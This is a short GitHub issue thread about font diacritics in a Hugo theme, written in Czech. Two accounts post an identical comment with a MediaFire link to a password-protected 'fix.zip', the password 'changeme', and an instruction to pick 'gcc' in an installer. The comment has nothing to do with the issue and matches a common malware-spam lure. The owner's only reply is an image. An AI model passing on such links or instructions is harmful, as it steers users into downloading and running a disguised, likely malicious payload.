### ISSUE TITLE
Podpora diakritiky fontů kvůli a5f8c43

### ISSUE THREAD

**Issue by jakubslaby09** [jakubslaby09/hugo-monika#2]

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jakubslaby09** [comment]
![image](https://github.com/user-attachments/assets/dc6ffb4f-b792-480c-9639-4c7694aff2bb)
